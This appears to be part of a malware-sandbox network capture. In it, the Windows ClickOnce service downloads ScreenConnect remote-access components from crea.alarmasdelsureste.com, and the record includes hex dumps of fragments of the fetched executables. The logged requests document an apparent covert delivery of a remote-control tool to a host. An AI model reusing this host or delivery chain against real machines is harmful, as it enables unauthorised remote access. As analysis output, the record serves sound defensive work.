                                                                                                                                                                                                                                                2024-12-22 11:47:27 UTC16384INData Raw: 4d 6f 6e 69 74 6f 72 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 4f 70 65 6e 4d 6f 6e 69 74 6f 72 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6e 74 72 6f 6c 50 61 6e 65 6c 4d 65 73 73 61 67 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 53 65 6e 64 43 6c 69 70 62 6f 61 72 64 4b 65 79 73 74 72 6f 6b 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 53 65 6e 64 46 69 6c 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 52 65 63 65 69 76 65
                                                                                                                                                                                                                                                Data Ascii: Monitor.pngScreenConnect.Properties.CommandOpenMonitor.pngScreenConnect.Properties.ControlPanelMessages.pngScreenConnect.Properties.CommandSendClipboardKeystrokes.pngScreenConnect.Properties.CommandSendFiles.pngScreenConnect.Properties.CommandReceive
                                                                                                                                                                                                                                                2024-12-22 11:47:27 UTC16384INData Raw: 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 3b 53 00 65 00 6c 00 65 00 63 00 74 00 53 00 6f 00 75 00 6e 00 64 00 43 00 61 00 70 00 74 00 75 00 72 00 65 00 4d 00 6f 00 64 00 65 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 27 53 00 6f 00 75 00 6e 00 64 00 43 00 61 00 70 00 74 00 75 00 72 00 65 00 4d 00 6f 00 64 00 65 00 20 00 3d 00 20 00 00 2b 53 00 65 00 6c 00 65 00 63 00 74 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 27 4d 00 75 00 74 00 65 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 31 53 00 65 00 74 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 56 00 6f 00 6c 00 75 00 6d 00 65 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 13 56 00 6f 00 6c 00 75
                                                                                                                                                                                                                                                Data Ascii: ommand;SelectSoundCaptureModeCommand'SoundCaptureMode = +SelectSpeakersCommand'MuteSpeakersCommand1SetSpeakersVolumeCommandVolu
                                                                                                                                                                                                                                                2024-12-22 11:47:27 UTC16384INData Raw: 74 4d 69 6c 6c 69 73 65 63 6f 6e 64 43 6f 75 6e 74 13 57 61 73 4e 65 74 77 6f 72 6b 52 65 61 63 68 61 62 6c 65 13 57 61 73 48 61 6e 64 73 68 61 6b 65 53 74 61 72 74 65 64 15 57 61 73 48 61 6e 64 73 68 61 6b 65 43 6f 6d 70 6c 65 74 65 64 00 00 21 01 00 02 00 00 00 10 4d 65 74 72 69 63 73 45 6e 74 72 79 54 79 70 65 07 4d 69 6e 69 6d 75 6d 00 00 26 01 00 84 6b 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 26 01 00 4c 14 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 26 01 00 02 00 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 06 01 00 e4 00 00 00 06 01 00 48 00 00 00 06 01 00 49 00 00 00 06 01
                                                                                                                                                                                                                                                Data Ascii: tMillisecondCountWasNetworkReachableWasHandshakeStartedWasHandshakeCompleted!MetricsEntryTypeMinimum&kTAllowMultipleTInherited&LTAllowMultipleTInherited&TAllowMultipleTInheritedHI


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                9192.168.2.449760104.168.134.2324437604C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-22 11:47:29 UTC134OUTGET /Bin/ScreenConnect.ClientService.dll HTTP/1.1
                                                                                                                                                                                                                                                Host: crea.alarmasdelsureste.com
                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                2024-12-22 11:47:29 UTC215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                Content-Length: 68096
                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                Server: ScreenConnect/24.2.10.8991-775909207 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                Date: Sun, 22 Dec 2024 11:47:29 GMT
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-22 11:47:29 UTC16169INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 30 d8 54 90 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 02 01 00 00 06 00 00 00 00 00 00 ba 20 01 00 00 20 00 00 00 40 01 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 01 00 00 02 00 00 64 fa 01 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL0T" 0 @ d@
                                                                                                                                                                                                                                                2024-12-22 11:47:29 UTC16384INData Raw: 00 0a 07 6f 11 00 00 0a 2d d0 de 0a 07 2c 06 07 6f 10 00 00 0a dc 06 7b 54 00 00 04 6f 24 02 00 0a 13 04 2b 5a 11 04 6f 25 02 00 0a 13 05 02 7b 53 00 00 04 7b 0d 00 00 04 11 05 73 26 02 00 0a 25 02 7b 52 00 00 04 28 f8 00 00 0a 7e 30 00 00 04 25 2d 17 26 7e 2b 00 00 04 fe 06 6d 00 00 06 73 06 02 00 0a 25 80 30 00 00 04 28 5f 00 00 2b 6f 27 02 00 0a 73 81 00 00 0a 6f 82 00 00 0a 11 04 6f 11 00 00 0a 2d 9d de 0c 11 04 2c 07 11 04 6f 10 00 00 0a dc 2a 01 1c 00 00 02 00 65 00 34 99 00 0a 00 00 00 00 02 00 b0 00 67 17 01 0c 00 00 00 00 1e 02 28 1d 00 00 0a 2a 56 02 7b 54 00 00 04 03 6f 23 02 00 0a 6f 28 02 00 0a 16 fe 01 2a 1e 02 28 1d 00 00 0a 2a 4a 02 7b 56 00 00 04 6f 29 02 00 0a 03 28 2a 02 00 0a 2a 1e 02 28 1d 00 00 0a 2a 00 00 00 13 30 03 00 43 00 00 00
                                                                                                                                                                                                                                                Data Ascii: o-,o{To$+Zo%{S{s&%{R(~0%-&~+ms%0(_+o'soo-,o*e4g(*V{To#o(*(*J{Vo)(**(*0C
                                                                                                                                                                                                                                                2024-12-22 11:47:29 UTC16384INData Raw: 15 19 04 ae 2d 2d 15 19 04 cd 2e 37 15 b1 04 3c 27 3e 15 31 04 cb 31 78 09 29 04 e0 42 f6 00 e9 04 fe 42 56 15 f4 00 9b 18 81 02 31 04 a5 32 5c 15 f4 03 71 3a a1 00 fc 03 71 3a a1 00 19 04 ca 2d 85 15 11 03 71 3a 6a 04 09 03 5e 30 9e 15 d9 07 e5 35 a7 15 09 03 42 2c ad 15 e1 07 6b 29 06 00 19 03 5d 31 20 02 31 04 83 2d bd 15 29 04 84 31 6a 04 19 03 80 25 20 02 29 04 ad 25 6a 04 19 03 99 1b 20 02 29 04 c6 1b 6a 04 e1 07 61 29 06 00 21 03 f7 2e 20 02 d1 00 ea 49 c5 15 29 04 04 2f 6a 04 a9 04 31 3d b2 11 8c 03 8d 08 5a 04 e9 04 b2 49 bd 0a 04 04 f8 3e 46 00 8c 03 52 0b 5e 04 e9 04 cd 42 d8 15 31 04 e2 34 e0 15 29 04 e0 46 14 01 d1 01 9a 42 ef 15 5c 02 de 2c 63 00 09 02 e1 2e 14 01 69 02 c8 41 00 16 69 02 c3 17 14 01 29 05 7a 2d f6 00 59 03 d0 2d 06 16 a4 02
                                                                                                                                                                                                                                                Data Ascii: --.7<'>11x)BBV12\q:q:-q:j^05B,k)]1 1-)1j% )%j )ja)!. I)/j1=ZI>FR^B14)FB\,c.iAi)z-Y-
                                                                                                                                                                                                                                                2024-12-22 11:47:30 UTC16384INData Raw: 74 79 41 63 74 69 6f 6e 00 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 00 53 65 74 74 69 6e 67 73 50 72 6f 70 65 72 74 79 56 61 6c 75 65 43 6f 6c 6c 65 63 74 69 6f 6e 00 47 72 6f 75 70 43 6f 6c 6c 65 63 74 69 6f 6e 00 57 61 69 74 69 6e 67 46 6f 72 43 6f 6e 6e 65 63 74 69 6f 6e 00 57 69 6e 33 32 45 78 63 65 70 74 69 6f 6e 00 43 72 79 70 74 6f 67 72 61 70 68 69 63 45 78 63 65 70 74 69 6f 6e 00 4e 6f 74 53 75 70 70 6f 72 74 65 64 45 78 63 65 70 74 69 6f 6e 00 54 72 61 63 65 45 78 63 65 70 74 69 6f 6e 00 45 6e 64 4f 66 53 74 72 65 61 6d 45 78 63 65 70 74 69 6f 6e 00 52 75 6e 57 69 74 68 43 72 61 73 68 4f 6e 45 78 63 65 70 74 69 6f 6e 00 54 72 79 53 75 62 73 63 72 69 62 65 54 6f 4c 6f 67 41 70 70 44 6f 6d 61 69 6e 45 78 63 65 70 74 69 6f 6e 00 49 6e 76
                                                                                                                                                                                                                                                Data Ascii: tyActionSystem.ReflectionSettingsPropertyValueCollectionGroupCollectionWaitingForConnectionWin32ExceptionCryptographicExceptionNotSupportedExceptionTraceExceptionEndOfStreamExceptionRunWithCrashOnExceptionTrySubscribeToLogAppDomainExceptionInv
                                                                                                                                                                                                                                                2024-12-22 11:47:30 UTC2775INData Raw: 08 01 00 00 08 00 00 00 00 05 01 00 01 00 00 05 01 00 02 00 00 0a 01 00 02 00 00 00 00 01 00 00 20 01 00 03 00 00 00 09 53 65 73 73 69 6f 6e 49 44 04 4e 61 6d 65 08 55 73 65 72 4e 61 6d 65 00 00 0d 01 00 05 00 00 00 00 00 00 00 01 00 00 2d 01 00 02 00 00 00 1c 43 72 65 64 65 6e 74 69 61 6c 50 72 6f 76 69 64 65 72 49 6e 73 74 61 6e 63 65 49 44 07 4d 65 73 73 61 67 65 00 00 0b 01 00 03 00 00 00 00 01 01 00 00 33 01 00 03 00 00 00 0e 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 0b 43 6f 6d 6d 61 6e 64 4c 69 6e 65 0f 50 61 72 65 6e 74 50 72 6f 63 65 73 73 49 44 00 00 52 01 00 05 00 00 00 0e 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 0b 43 6f 6d 6d 61 6e 64 4c 69 6e 65 0f 50 61 72 65 6e 74 50 72 6f 63 65 73 73 49 44 0e 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 0f
                                                                                                                                                                                                                                                Data Ascii: SessionIDNameUserName-CredentialProviderInstanceIDMessage3ExecutablePathCommandLineParentProcessIDRExecutablePathCommandLineParentProcessIDExecutablePath


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                10192.168.2.449762104.168.134.2324437604C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-22 11:47:31 UTC128OUTGET /Bin/ScreenConnect.Windows.dll HTTP/1.1
                                                                                                                                                                                                                                                Host: crea.alarmasdelsureste.com
                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                2024-12-22 11:47:32 UTC217INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                Content-Length: 1721856
                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                Server: ScreenConnect/24.2.10.8991-775909207 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                Date: Sun, 22 Dec 2024 11:47:31 GMT
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-22 11:47:32 UTC16167INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c da d0 ab 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 3e 1a 00 00 06 00 00 00 00 00 00 82 5d 1a 00 00 20 00 00 00 60 1a 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 1a 00 00 02 00 00 5b ab 1a 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELl" 0>] ` [@
                                                                                                                                                                                                                                                2024-12-22 11:47:32 UTC16384INData Raw: 00 0a 14 04 05 16 28 ba 00 00 06 13 06 de 11 09 28 01 02 00 0a dc 06 2c 06 06 6f 11 00 00 0a dc 11 06 2a 00 00 01 34 00 00 02 00 99 00 0a a3 00 0c 00 00 00 00 02 00 81 00 2e af 00 0c 00 00 00 00 02 00 73 00 87 fa 00 07 00 00 00 00 02 00 06 00 fb 01 01 0a 00 00 00 00 13 30 02 00 1f 00 00 00 2a 00 00 11 1f 28 7e 5e 00 00 0a 28 e0 00 00 06 72 71 06 00 70 28 02 02 00 0a 0a 02 06 28 bd 00 00 06 2a 00 13 30 05 00 47 00 00 00 00 00 00 00 03 25 2d 06 26 28 be 00 00 06 18 8d d9 00 00 01 25 16 72 9d 06 00 70 a2 25 17 72 b9 06 00 70 a2 28 03 02 00 0a 7e a7 00 00 04 25 2d 13 26 14 fe 06 04 02 00 0a 73 05 02 00 0a 25 80 a7 00 00 04 02 28 32 00 00 2b 2a 00 1b 30 04 00 90 00 00 00 3a 00 00 11 28 0d 01 00 06 1f 0a 16 20 7c 4f 00 00 73 07 02 00 0a 28 6e 01 00 0a 2c 35 20
                                                                                                                                                                                                                                                Data Ascii: ((,o*4.s0*(~^(rqp((*0G%-&(%rp%rp(~%-&s%(2+*0:( |Os(n,5
                                                                                                                                                                                                                                                2024-12-22 11:47:32 UTC16384INData Raw: 00 00 04 7d f8 00 00 04 02 17 7d f7 00 00 04 17 2a 02 15 7d f7 00 00 04 02 02 7b fc 00 00 04 18 28 aa 01 00 06 7d fc 00 00 04 02 7b fc 00 00 04 16 d3 28 84 00 00 0a 2d c3 16 2a 1e 02 7b f8 00 00 04 2a 1a 73 7b 01 00 0a 7a 32 02 7b f8 00 00 04 8c ce 00 00 01 2a 00 00 13 30 02 00 3c 00 00 00 88 00 00 11 02 7b f7 00 00 04 1f fe 33 1d 02 7b f9 00 00 04 28 4e 03 00 0a 6f 4f 03 00 0a 33 0b 02 16 7d f7 00 00 04 02 0a 2b 07 16 73 4d 03 00 06 0a 06 02 7b fb 00 00 04 7d fa 00 00 04 06 2a 1e 02 28 53 03 00 06 2a 7a 02 28 2c 00 00 0a 02 03 7d fd 00 00 04 02 28 4e 03 00 0a 6f 4f 03 00 0a 7d ff 00 00 04 2a 06 2a 00 00 00 13 30 05 00 d5 00 00 00 89 00 00 11 02 7b fd 00 00 04 0a 06 2c 09 06 17 3b 8d 00 00 00 16 2a 02 15 7d fd 00 00 04 1f 09 0b 02 17 07 25 17 58 0b 1f 1f
                                                                                                                                                                                                                                                Data Ascii: }}*}{(}{(-*{*s{z2{*0<{3{(NoO3}+sM{}*(S*z(,}(NoO}**0{,;*}%X
                                                                                                                                                                                                                                                2024-12-22 11:47:32 UTC16384INData Raw: 22 06 00 71 cc 6e 22 06 00 48 cf 6e 22 06 00 5e 3e 6e 22 06 00 9f a3 6e 22 06 00 c4 b2 a0 02 06 00 36 b2 6e 22 06 00 49 a7 a0 02 06 00 41 a7 6e 22 06 00 81 cc 6e 22 06 00 af 54 6e 22 06 00 ba 90 6e 22 06 00 9f a3 6e 22 06 00 7c aa 6e 22 06 00 f7 cf 71 22 06 00 ce 45 71 22 06 00 66 46 6e 22 06 00 07 59 6e 22 06 00 b6 bf 6e 22 06 00 31 6a 6e 22 06 00 8f 9f 6e 22 06 00 e8 60 6e 22 06 00 48 cf 6e 22 06 00 f4 5f 6e 22 06 00 04 52 25 25 06 00 e3 be 6e 22 06 00 5b be 6e 22 06 10 55 51 f7 25 06 06 80 30 af 08 56 80 80 c8 fb 25 56 80 69 c8 fb 25 06 06 80 30 af 08 56 80 35 9d 00 26 06 06 80 30 af 08 56 80 62 27 05 26 56 80 90 29 05 26 56 80 e3 0d 05 26 56 80 86 29 05 26 06 06 80 30 6e 22 56 80 2c 39 0a 26 56 80 97 c8 0a 26 56 80 5f 39 0a 26 56 80 60 bd 0a 26 56 80
                                                                                                                                                                                                                                                Data Ascii: "qn"Hn"^>n"n"6n"IAn"n"Tn"n"n"|n"q"Eq"fFn"Yn"n"1jn"n"`n"Hn"_n"R%%n"[n"UQ%0V%Vi%0V5&0Vb'&V)&V&V)&0n"V,9&V&V_9&V`&V
                                                                                                                                                                                                                                                2024-12-22 11:47:32 UTC16384INData Raw: 00 5e 53 10 00 0f 07 5e a5 00 00 00 00 91 18 18 99 0e 27 10 07 6a a5 00 00 00 00 86 18 ed 98 01 00 10 07 72 a5 00 00 00 00 83 00 d7 02 29 3b 10 07 7a a5 00 00 00 00 83 00 81 0a 30 3b 12 07 82 a5 00 00 00 00 86 18 ed 98 01 00 13 07 8a a5 00 00 00 00 83 00 d6 07 1b 3b 13 07 9d a5 00 00 00 00 91 18 18 99 0e 27 14 07 a9 a5 00 00 00 00 86 18 ed 98 01 00 14 07 b1 a5 00 00 00 00 83 00 ab 02 39 3b 14 07 b9 a5 00 00 00 00 83 00 55 0a 39 3b 15 07 c1 a5 00 00 00 00 86 18 ed 98 05 00 16 07 e0 a5 00 00 00 00 e1 01 ac 58 01 00 17 07 18 a6 00 00 00 00 e1 01 37 c2 3d 00 17 07 e4 a7 00 00 00 00 81 00 d5 0d 01 00 17 07 00 a8 00 00 00 00 e1 09 d0 bb e0 18 17 07 08 a8 00 00 00 00 e1 01 13 b6 01 00 17 07 0f a8 00 00 00 00 e1 09 96 bc 4e 00 17 07 18 a8 00 00 00 00 e1 01 bd 97
                                                                                                                                                                                                                                                Data Ascii: ^S^'jr);z0;;'9;U9;X7=N
                                                                                                                                                                                                                                                2024-12-22 11:47:32 UTC16384INData Raw: 34 45 10 a9 06 0b 5f 39 02 3c 04 8d 4a a0 02 91 04 5f 46 01 00 89 06 8d 58 39 02 d1 03 86 c7 01 00 69 04 a6 58 01 00 71 09 dc 37 b1 1a 71 09 1c 36 89 01 59 06 ab cc e9 1a e1 02 ed 98 f8 1a e1 02 ed 98 07 1b 41 06 ed 98 10 00 b9 08 ae 9e 16 1b 19 0a 85 3e 1d 1b 29 02 96 4c 7c 04 31 02 ed 98 01 00 99 04 68 53 f5 09 c1 09 21 5b 10 00 39 02 96 4c 7c 04 39 02 35 70 89 01 99 02 e2 6a 7c 04 99 02 28 59 3b 1b b1 07 1b 6b 3d 0b 4c 04 a8 98 5b 00 54 04 b5 bc 49 00 44 02 ab 0d d9 00 08 00 14 00 25 1c 08 00 18 00 2a 1c 08 00 1c 00 2f 1c 08 00 20 00 34 1c 08 00 b8 00 39 1c 0e 00 bc 00 3e 1c 0e 00 c0 00 51 1c 0e 00 c4 00 62 1c 08 00 c8 00 75 1c 08 00 cc 00 7a 1c 0e 00 d0 00 7f 1c 0e 00 d4 00 8e 1c 0e 00 d8 00 9d 1c 0e 00 e0 00 c6 1c 08 00 f0 00 64 1d 08 00 f4 00 69 1d
                                                                                                                                                                                                                                                Data Ascii: 4E_9<J_FX9iXq7q6YA>)L|1hS![9L|95pj|(Y;k=L[TID%*/ 49>Qbuzdi
                                                                                                                                                                                                                                                2024-12-22 11:47:32 UTC16384INData Raw: 39 5f 5f 31 33 35 5f 31 00 3c 47 65 74 46 75 6c 6c 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 3e 62 5f 5f 31 33 35 5f 31 00 3c 3e 63 5f 5f 44 69 73 70 6c 61 79 43 6c 61 73 73 34 37 5f 31 00 3c 43 6f 6e 6e 65 63 74 53 65 72 76 65 72 43 6c 69 65 6e 74 4e 61 6d 65 64 50 69 70 65 73 3e 67 5f 5f 57 61 69 74 41 6e 64 43 6f 6e 6e 65 63 74 4e 61 6d 65 64 50 69 70 65 7c 39 37 5f 31 00 3c 50 6f 70 75 6c 61 74 65 43 6f 6e 74 65 78 74 4d 65 6e 75 53 74 72 69 70 49 74 65 6d 73 3e 62 5f 5f 37 5f 31 00 3c 3e 39 5f 5f 38 5f 31 00 3c 50 6f 70 75 6c 61 74 65 43 6f 6e 74 65 78 74 4d 65 6e 75 53 74 72 69 70 49 74 65 6d 73 3e 62 5f 5f 38 5f 31 00 3c 3e 39 5f 5f 32 39 5f 31 00 3c 54 72 79 47 65 74 41 63 74 69 76 65 43 6f 6e 73 6f 6c 65 53 65 73 73 69 6f 6e 49 44 3e 62 5f 5f 32
                                                                                                                                                                                                                                                Data Ascii: 9__135_1<GetFullExecutablePath>b__135_1<>c__DisplayClass47_1<ConnectServerClientNamedPipes>g__WaitAndConnectNamedPipe|97_1<PopulateContextMenuStripItems>b__7_1<>9__8_1<PopulateContextMenuStripItems>b__8_1<>9__29_1<TryGetActiveConsoleSessionID>b__2
                                                                                                                                                                                                                                                2024-12-22 11:47:32 UTC16384INData Raw: 61 73 65 4b 65 79 48 61 6e 64 6c 65 00 6c 69 62 72 61 72 79 48 61 6e 64 6c 65 00 72 65 73 75 6d 65 5f 68 61 6e 64 6c 65 00 54 6f 52 65 63 74 61 6e 67 6c 65 00 47 65 74 43 6c 69 65 6e 74 52 65 63 74 61 6e 67 6c 65 00 47 65 74 57 69 6e 64 6f 77 52 65 63 74 61 6e 67 6c 65 00 72 65 63 74 61 6e 67 6c 65 00 70 44 61 74 61 46 69 6c 65 00 75 6c 6c 54 6f 74 61 6c 50 61 67 65 46 69 6c 65 00 75 6c 6c 41 76 61 69 6c 50 61 67 65 46 69 6c 65 00 43 72 65 61 74 65 46 69 6c 65 00 68 54 65 6d 70 6c 61 74 65 46 69 6c 65 00 44 65 6c 65 74 65 46 69 6c 65 00 4d 6f 76 65 46 69 6c 65 00 70 43 6f 6e 66 69 67 46 69 6c 65 00 54 72 79 55 6e 62 6c 6f 63 6b 46 69 6c 65 00 4c 6f 61 64 52 65 73 6f 75 72 63 65 50 61 63 6b 46 72 6f 6d 46 69 6c 65 00 4d 61 70 46 69 6c 65 00 70 48 65 6c 70
                                                                                                                                                                                                                                                Data Ascii: aseKeyHandlelibraryHandleresume_handleToRectangleGetClientRectangleGetWindowRectanglerectanglepDataFileullTotalPageFileullAvailPageFileCreateFilehTemplateFileDeleteFileMoveFilepConfigFileTryUnblockFileLoadResourcePackFromFileMapFilepHelp
                                                                                                                                                                                                                                                2024-12-22 11:47:32 UTC16384INData Raw: 00 3c 39 3e 5f 5f 43 6c 6f 73 65 44 65 73 6b 74 6f 70 00 43 72 65 61 74 65 44 65 73 6b 74 6f 70 00 53 77 69 74 63 68 44 65 73 6b 74 6f 70 00 4f 70 65 6e 44 65 73 6b 74 6f 70 00 6c 70 44 65 73 6b 74 6f 70 00 54 72 79 45 6e 73 75 72 65 54 68 72 65 61 64 4f 6e 49 6e 70 75 74 44 65 73 6b 74 6f 70 00 4f 70 65 6e 49 6e 70 75 74 44 65 73 6b 74 6f 70 00 6c 70 73 7a 44 65 73 6b 74 6f 70 00 64 65 73 6b 74 6f 70 00 65 5f 73 70 00 55 72 69 53 63 68 65 6d 65 48 74 74 70 00 4e 61 74 69 76 65 43 6c 65 61 6e 75 70 00 6c 70 4c 6f 61 64 4f 72 64 65 72 47 72 6f 75 70 00 47 65 74 4c 61 73 74 41 63 74 69 76 65 50 6f 70 75 70 00 41 70 70 44 6f 6d 61 69 6e 53 65 74 75 70 00 70 73 7a 56 65 6e 64 6f 72 53 65 74 75 70 00 66 43 6f 6e 74 65 78 74 52 65 71 00 53 79 73 74 65 6d 2e 4c
                                                                                                                                                                                                                                                Data Ascii: <9>__CloseDesktopCreateDesktopSwitchDesktopOpenDesktoplpDesktopTryEnsureThreadOnInputDesktopOpenInputDesktoplpszDesktopdesktope_spUriSchemeHttpNativeCleanuplpLoadOrderGroupGetLastActivePopupAppDomainSetuppszVendorSetupfContextReqSystem.L
                                                                                                                                                                                                                                                2024-12-22 11:47:33 UTC16384INData Raw: 4f 70 65 6e 52 65 67 69 73 74 72 79 4b 65 79 00 43 72 65 61 74 65 50 72 6f 70 65 72 74 79 4b 65 79 00 47 65 74 48 6f 74 6b 65 79 00 53 65 74 48 6f 74 6b 65 79 00 70 77 48 6f 74 6b 65 79 00 53 79 73 74 65 6d 2e 53 65 63 75 72 69 74 79 2e 43 72 79 70 74 6f 67 72 61 70 68 79 00 67 65 74 5f 41 73 73 65 6d 62 6c 79 00 67 65 74 5f 46 6f 6e 74 46 61 6d 69 6c 79 00 44 65 66 61 75 6c 74 46 6f 6e 74 46 61 6d 69 6c 79 00 54 72 79 44 69 73 61 62 6c 65 46 69 6c 65 53 79 73 74 65 6d 52 65 64 69 72 65 63 74 69 6f 6e 54 65 6d 70 6f 72 61 72 69 6c 79 00 73 65 74 5f 52 65 61 64 4f 6e 6c 79 00 44 69 73 70 6f 73 65 51 75 69 65 74 6c 79 00 70 6f 69 6e 74 6c 79 00 53 65 6c 65 63 74 4d 61 6e 79 00 53 68 75 74 64 6f 77 6e 42 6c 6f 63 6b 52 65 61 73 6f 6e 44 65 73 74 72 6f 79 00
                                                                                                                                                                                                                                                Data Ascii: OpenRegistryKeyCreatePropertyKeyGetHotkeySetHotkeypwHotkeySystem.Security.Cryptographyget_Assemblyget_FontFamilyDefaultFontFamilyTryDisableFileSystemRedirectionTemporarilyset_ReadOnlyDisposeQuietlypointlySelectManyShutdownBlockReasonDestroy


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                11192.168.2.449763104.168.134.2324437604C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-22 11:47:36 UTC134OUTGET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1
                                                                                                                                                                                                                                                Host: crea.alarmasdelsureste.com
                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                2024-12-22 11:47:36 UTC216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                Content-Length: 601376
                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                Server: ScreenConnect/24.2.10.8991-775909207 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                Date: Sun, 22 Dec 2024 11:47:35 GMT
                                                                                                                                                                                                                                                Connection: close
